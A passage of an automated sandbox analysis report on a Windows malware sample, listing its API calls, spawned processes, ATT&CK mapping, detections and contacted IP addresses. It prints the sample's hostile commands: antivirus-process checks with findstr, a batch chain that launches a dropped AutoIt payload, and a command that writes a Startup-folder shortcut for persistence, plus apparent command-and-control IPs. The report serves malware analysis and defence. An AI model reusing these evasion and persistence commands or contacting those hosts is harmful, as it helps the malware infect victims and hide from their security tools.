      Source: C:\Users\user\AppData\Local\Temp\353685\Soldiers.pifCode function: 22_2_008F5EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,22_2_008F5EDA
      Source: C:\Users\user\AppData\Local\DesignQuantum Innovations\ChameleonCraft.scrCode function: 23_2_00A259B3 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,23_2_00A259B3
      Source: C:\Users\user\AppData\Local\DesignQuantum Innovations\ChameleonCraft.scrCode function: 23_2_009B5EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,23_2_009B5EDA
      Source: C:\Users\user\AppData\Local\Temp\353685\Soldiers.pifCode function: 22_2_009033B7 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,22_2_009033B7
      Source: C:\Users\user\Desktop\sV9ElC4fU4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\sV9ElC4fU4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\sV9ElC4fU4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\sV9ElC4fU4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\sV9ElC4fU4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\sV9ElC4fU4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\sV9ElC4fU4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\sV9ElC4fU4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\sV9ElC4fU4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\sV9ElC4fU4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\sV9ElC4fU4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\sV9ElC4fU4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\353685\Soldiers.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\353685\Soldiers.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\353685\Soldiers.pifProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\DesignQuantum Innovations\ChameleonCraft.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\DesignQuantum Innovations\ChameleonCraft.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\DesignQuantum Innovations\ChameleonCraft.scrProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\353685\Soldiers.pifProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\DesignQuantum Innovations\ChameleonCraft.scrProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Users\user\Desktop\sV9ElC4fU4.exeCode function: 0_2_004062EB FindFirstFileW,FindClose,0_2_004062EB
      Source: C:\Users\user\Desktop\sV9ElC4fU4.exeCode function: 0_2_00406CB1 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406CB1
      Source: C:\Users\user\AppData\Local\Temp\353685\Soldiers.pifCode function: 22_2_00944005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,22_2_00944005
      Source: C:\Users\user\AppData\Local\Temp\353685\Soldiers.pifCode function: 22_2_0094C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,22_2_0094C2FF
      Source: C:\Users\user\AppData\Local\Temp\353685\Soldiers.pifCode function: 22_2_0094494A GetFileAttributesW,FindFirstFileW,FindClose,22_2_0094494A
      Source: C:\Users\user\AppData\Local\Temp\353685\Soldiers.pifCode function: 22_2_0094CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,22_2_0094CD9F
      Source: C:\Users\user\AppData\Local\Temp\353685\Soldiers.pifCode function: 22_2_0094CD14 FindFirstFileW,FindClose,22_2_0094CD14
      Source: C:\Users\user\AppData\Local\Temp\353685\Soldiers.pifCode function: 22_2_0094F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,22_2_0094F5D8
      Source: C:\Users\user\AppData\Local\Temp\353685\Soldiers.pifCode function: 22_2_0094F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,22_2_0094F735
      Source: C:\Users\user\AppData\Local\Temp\353685\Soldiers.pifCode function: 22_2_0094FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,22_2_0094FA36
      Source: C:\Users\user\AppData\Local\Temp\353685\Soldiers.pifCode function: 22_2_00943CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,22_2_00943CE2
      Source: C:\Users\user\AppData\Local\DesignQuantum Innovations\ChameleonCraft.scrCode function: 23_2_00A04005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,23_2_00A04005
      Source: C:\Users\user\AppData\Local\DesignQuantum Innovations\ChameleonCraft.scrCode function: 23_2_00A0C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,23_2_00A0C2FF
      Source: C:\Users\user\AppData\Local\DesignQuantum Innovations\ChameleonCraft.scrCode function: 23_2_00A0494A GetFileAttributesW,FindFirstFileW,FindClose,23_2_00A0494A
      Source: C:\Users\user\AppData\Local\DesignQuantum Innovations\ChameleonCraft.scrCode function: 23_2_00A0CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,23_2_00A0CD9F
      Source: C:\Users\user\AppData\Local\DesignQuantum Innovations\ChameleonCraft.scrCode function: 23_2_00A0CD14 FindFirstFileW,FindClose,23_2_00A0CD14
      Source: C:\Users\user\AppData\Local\DesignQuantum Innovations\ChameleonCraft.scrCode function: 23_2_00A0F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,23_2_00A0F5D8
      Source: C:\Users\user\AppData\Local\DesignQuantum Innovations\ChameleonCraft.scrCode function: 23_2_00A0F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,23_2_00A0F735
      Source: C:\Users\user\AppData\Local\DesignQuantum Innovations\ChameleonCraft.scrCode function: 23_2_00A0FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,23_2_00A0FA36
      Source: C:\Users\user\AppData\Local\DesignQuantum Innovations\ChameleonCraft.scrCode function: 23_2_00A03CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,23_2_00A03CE2
      Source: C:\Users\user\AppData\Local\Temp\353685\Soldiers.pifCode function: 22_2_008F5D13 GetVersionExW,GetCurrentProcess,IsWow64Process,FreeLibrary,GetSystemInfo,GetSystemInfo,22_2_008F5D13
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\353685Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\353685\Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
      Source: ChameleonCraft.scr, 00000017.00000002.2715258188.0000000001E67000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll~
      Source: Soldiers.pif, 00000016.00000002.2715103951.00000000019E7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
      Source: C:\Users\user\AppData\Local\Temp\353685\Soldiers.pifProcess information queried: ProcessInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\353685\Soldiers.pifCode function: 22_2_009545D5 BlockInput,22_2_009545D5
      Source: C:\Users\user\AppData\Local\Temp\353685\Soldiers.pifCode function: 22_2_00908E89 _memset,IsDebuggerPresent,22_2_00908E89
      Source: C:\Users\user\AppData\Local\Temp\353685\Soldiers.pifCode function: 22_2_00915CAC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,22_2_00915CAC
      Source: C:\Users\user\Desktop\sV9ElC4fU4.exeCode function: 0_2_00406312 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00406312
      Source: C:\Users\user\AppData\Local\Temp\353685\Soldiers.pifCode function: 22_2_009388CD GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,22_2_009388CD
      Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\353685\Soldiers.pifCode function: 22_2_0090A385 SetUnhandledExceptionFilter,UnhandledExceptionFilter,22_2_0090A385
      Source: C:\Users\user\AppData\Local\Temp\353685\Soldiers.pifCode function: 22_2_0090A354 SetUnhandledExceptionFilter,22_2_0090A354
      Source: C:\Users\user\AppData\Local\DesignQuantum Innovations\ChameleonCraft.scrCode function: 23_2_009CA385 SetUnhandledExceptionFilter,UnhandledExceptionFilter,23_2_009CA385
      Source: C:\Users\user\AppData\Local\DesignQuantum Innovations\ChameleonCraft.scrCode function: 23_2_009CA354 SetUnhandledExceptionFilter,23_2_009CA354

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Injects a PE file into a foreign processes
      Source: C:\Users\user\AppData\Local\Temp\353685\Soldiers.pifMemory written: C:\Users\user\AppData\Local\Temp\353685\Soldiers.pif base: 1200000 value starts with: 4D5AJump to behavior
      Source: C:\Users\user\AppData\Local\DesignQuantum Innovations\ChameleonCraft.scrMemory written: C:\Users\user\AppData\Local\DesignQuantum Innovations\ChameleonCraft.scr base: 14C0000 value starts with: 4D5AJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\353685\Soldiers.pifCode function: 22_2_00939369 LogonUserW,22_2_00939369
      Source: C:\Users\user\AppData\Local\Temp\353685\Soldiers.pifCode function: 22_2_008F5240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,22_2_008F5240
      Source: C:\Users\user\AppData\Local\Temp\353685\Soldiers.pifCode function: 22_2_00941AC6 SendInput,keybd_event,22_2_00941AC6
      Source: C:\Users\user\AppData\Local\Temp\353685\Soldiers.pifCode function: 22_2_009451E2 mouse_event,22_2_009451E2
      Source: C:\Users\user\Desktop\sV9ElC4fU4.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Min Min.bat & Min.batJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc" Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui avgui bdservicehost nswscsvc sophoshealth" Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 353685Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "WirelessNeilAspBringing" Actively Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Skirts DJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\353685\Soldiers.pif Soldiers.pif DJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\353685\Soldiers.pifProcess created: C:\Users\user\AppData\Local\Temp\353685\Soldiers.pif C:\Users\user\AppData\Local\Temp\353685\Soldiers.pifJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\DesignQuantum Innovations\ChameleonCraft.scr "C:\Users\user\AppData\Local\DesignQuantum Innovations\ChameleonCraft.scr" "C:\Users\user\AppData\Local\DesignQuantum Innovations\q"Jump to behavior
      Source: C:\Users\user\AppData\Local\DesignQuantum Innovations\ChameleonCraft.scrProcess created: C:\Users\user\AppData\Local\DesignQuantum Innovations\ChameleonCraft.scr "C:\Users\user\AppData\Local\DesignQuantum Innovations\ChameleonCraft.scr" Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\353685\Soldiers.pifProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\chameleoncraft.url" & echo url="c:\users\user\appdata\local\designquantum innovations\chameleoncraft.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\chameleoncraft.url" & exit
      Source: C:\Users\user\AppData\Local\Temp\353685\Soldiers.pifProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\chameleoncraft.url" & echo url="c:\users\user\appdata\local\designquantum innovations\chameleoncraft.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\chameleoncraft.url" & exitJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\353685\Soldiers.pifCode function: 22_2_009388CD GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,22_2_009388CD
      Source: C:\Users\user\AppData\Local\Temp\353685\Soldiers.pifCode function: 22_2_00944F1C AllocateAndInitializeSid,CheckTokenMembership,FreeSid,22_2_00944F1C
      Source: Soldiers.pif, 0000000B.00000003.1513951378.0000000003AE0000.00000004.00000800.00020000.00000000.sdmp, Soldiers.pif, 0000000B.00000000.1495123056.0000000000996000.00000002.00000001.01000000.00000005.sdmp, ChameleonCraft.scr, 00000011.00000000.1632541390.0000000000A56000.00000002.00000001.01000000.00000008.sdmpBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
      Source: Soldiers.pif, ChameleonCraft.scrBinary or memory string: Shell_TrayWnd
      Source: C:\Users\user\AppData\Local\Temp\353685\Soldiers.pifCode function: 22_2_0090885B cpuid 22_2_0090885B
      Source: C:\Users\user\AppData\Local\Temp\353685\Soldiers.pifQueries volume information: C:\Users\user\AppData\Local\config VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\DesignQuantum Innovations\ChameleonCraft.scrQueries volume information: C:\Users\user\AppData\Local\config VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\353685\Soldiers.pifCode function: 22_2_00920030 GetLocalTime,__swprintf,22_2_00920030
      Source: C:\Users\user\AppData\Local\Temp\353685\Soldiers.pifCode function: 22_2_00920722 GetUserNameW,22_2_00920722
      Source: C:\Users\user\AppData\Local\Temp\353685\Soldiers.pifCode function: 22_2_0091416A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,22_2_0091416A
      Source: C:\Users\user\Desktop\sV9ElC4fU4.exeCode function: 0_2_0040681B GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_0040681B
      Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

      Stealing of Sensitive Information

      barindex
      Yara detected GO Backdoor
      Source: Yara matchFile source: Process Memory Space: Soldiers.pif PID: 7096, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: ChameleonCraft.scr PID: 3900, type: MEMORYSTR
      Source: ChameleonCraft.scrBinary or memory string: WIN_81
      Source: ChameleonCraft.scrBinary or memory string: WIN_XP
      Source: ChameleonCraft.scrBinary or memory string: WIN_XPe
      Source: ChameleonCraft.scrBinary or memory string: WIN_VISTA
      Source: ChameleonCraft.scrBinary or memory string: WIN_7
      Source: ChameleonCraft.scrBinary or memory string: WIN_8
      Source: Analyses.0.drBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 3USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

      Remote Access Functionality

      barindex
      Yara detected GO Backdoor
      Source: Yara matchFile source: Process Memory Space: Soldiers.pif PID: 7096, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: ChameleonCraft.scr PID: 3900, type: MEMORYSTR

      Mitre Att&ck Matrix

      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity Information11
      Scripting      		2
      Valid Accounts      		1
      Windows Management Instrumentation      		11
      Scripting      		1
      Exploitation for Privilege Escalation      		1
      Disable or Modify Tools      		21
      Input Capture      		2
      System Time Discovery      		Remote Services1
      Archive Collected Data      		1
      Ingress Tool Transfer      		Exfiltration Over Other Network Medium1
      System Shutdown/Reboot
      CredentialsDomainsDefault Accounts1
      Native API      		1
      DLL Side-Loading      		1
      DLL Side-Loading      		1
      Deobfuscate/Decode Files or Information      		LSASS Memory1
      Account Discovery      		Remote Desktop Protocol21
      Input Capture      		1
      Encrypted Channel      		Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain Accounts1
      Command and Scripting Interpreter      		2
      Valid Accounts      		2
      Valid Accounts      		2
      Obfuscated Files or Information      		Security Account Manager3
      File and Directory Discovery      		SMB/Windows Admin Shares3
      Clipboard Data      		1
      Non-Standard Port      		Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCron2
      Registry Run Keys / Startup Folder      		21
      Access Token Manipulation      		1
      DLL Side-Loading      		NTDS27
      System Information Discovery      		Distributed Component Object ModelInput Capture2
      Non-Application Layer Protocol      		Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script112
      Process Injection      		11
      Masquerading      		LSA Secrets31
      Security Software Discovery      		SSHKeylogging2
      Application Layer Protocol      		Scheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts2
      Registry Run Keys / Startup Folder      		2
      Valid Accounts      		Cached Domain Credentials4
      Process Discovery      		VNCGUI Input Capture1
      Proxy      		Data Transfer Size LimitsService Stop
      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items21
      Access Token Manipulation      		DCSync1
      Application Window Discovery      		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job112
      Process Injection      		Proc Filesystem1
      System Owner/User Discovery      		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1533857 Sample: sV9ElC4fU4.exe Startdate: 15/10/2024 Architecture: WINDOWS Score: 100 56 CFIXDPmIiBsstXCezGs.CFIXDPmIiBsstXCezGs 2->56 64 Suricata IDS alerts for network traffic 2->64 66 Multi AV Scanner detection for submitted file 2->66 68 Yara detected GO Backdoor 2->68 70 5 other signatures 2->70 10 sV9ElC4fU4.exe 12 2->10         started        12 wscript.exe 1 2->12         started        signatures3 process4 signatures5 15 cmd.exe 2 10->15         started        78 Windows Scripting host queries suspicious COM object (likely to drop second stage) 12->78 19 ChameleonCraft.scr 12->19         started        process6 file7 48 C:\Users\user\AppData\Local\...\Soldiers.pif, PE32 15->48 dropped 58 Drops PE files with a suspicious file extension 15->58 21 Soldiers.pif 4 15->21         started        25 cmd.exe 2 15->25         started        27 conhost.exe 15->27         started        31 7 other processes 15->31 60 Injects a PE file into a foreign processes 19->60 29 ChameleonCraft.scr 19->29         started        signatures8 process9 file10 42 C:\Users\user\AppData\...\ChameleonCraft.scr, PE32 21->42 dropped 44 C:\Users\user\AppData\...\ChameleonCraft.js, ASCII 21->44 dropped 72 Drops PE files with a suspicious file extension 21->72 74 Injects a PE file into a foreign processes 21->74 33 Soldiers.pif 1 21->33         started        37 cmd.exe 2 21->37         started        76 Found Tor onion address 29->76 signatures11 process12 dnsIp13 50 94.103.85.114, 30202, 49962 VDSINA-ASRU Russian Federation 33->50 52 91.212.166.91, 49718, 49830, 49990 MOBILY-ASEtihadEtisalatCompanyMobilySA United Kingdom 33->52 54 3 other IPs or domains 33->54 62 Found Tor onion address 33->62 46 C:\Users\user\AppData\...\ChameleonCraft.url, MS 37->46 dropped 40 conhost.exe 37->40         started        file14 signatures15 process16

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      sV9ElC4fU4.exe45%ReversingLabsWin32.Trojan.Casdet
      sV9ElC4fU4.exe100%Joe Sandbox ML

      Dropped Files

      SourceDetectionScannerLabelLink
      C:\Users\user\AppData\Local\DesignQuantum Innovations\ChameleonCraft.scr5%ReversingLabs
      C:\Users\user\AppData\Local\Temp\353685\Soldiers.pif5%ReversingLabs

      Unpacked PE Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
      http://nsis.sf.net/NSIS_ErrorError0%URL Reputationsafe

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      CFIXDPmIiBsstXCezGs.CFIXDPmIiBsstXCezGs
      		unknown
      		unknowntrue
        		unknown

        Contacted URLs

        NameMaliciousAntivirus DetectionReputation
        http://46.8.232.106/false
          		unknown
          http://46.8.236.61/false
            		unknown
            http://93.185.159.253/false
              		unknown
              http://91.212.166.91/false
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://www.autoitscript.com/autoit3/JSoldiers.pif, 0000000B.00000003.1514078352.0000000003BD9000.00000004.00000800.00020000.00000000.sdmp, Soldiers.pif, 0000000B.00000000.1495388280.00000000009A9000.00000002.00000001.01000000.00000005.sdmp, ChameleonCraft.scr, 00000011.00000000.1633200129.0000000000A69000.00000002.00000001.01000000.00000008.sdmp, Soldiers.pif, 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmp, ChameleonCraft.scr, 00000017.00000000.2177972009.0000000000A69000.00000002.00000001.01000000.00000008.sdmp, Soldiers.pif.2.dr, ChameleonCraft.scr.11.dr, Analyses.0.drfalse
                  		unknown
                  http://91.212.166.91StartSoldiers.pif, 00000016.00000002.2716944772.000000000A8F6000.00000004.00001000.00020000.00000000.sdmpfalse
                    		unknown
                    http://46.8.232.106ChameleonCraft.scr, 00000017.00000002.2717881748.000000000AD28000.00000004.00001000.00020000.00000000.sdmpfalse
                      		unknown
                      http://93.185.159.253ChameleonCraft.scr, 00000017.00000002.2717881748.000000000AD28000.00000004.00001000.00020000.00000000.sdmpfalse
                        		unknown
                        http://46.8.236.61ChameleonCraft.scr, 00000017.00000002.2717881748.000000000AD28000.00000004.00001000.00020000.00000000.sdmpfalse
                          		unknown
                          http://91.212.166.91User-Agent:ChameleonCraft.scr, 00000017.00000002.2717881748.000000000AD28000.00000004.00001000.00020000.00000000.sdmpfalse
                            		unknown
                            http://nsis.sf.net/NSIS_ErrorErrorsV9ElC4fU4.exefalse
                            • URL Reputation: safe
                            		unknown
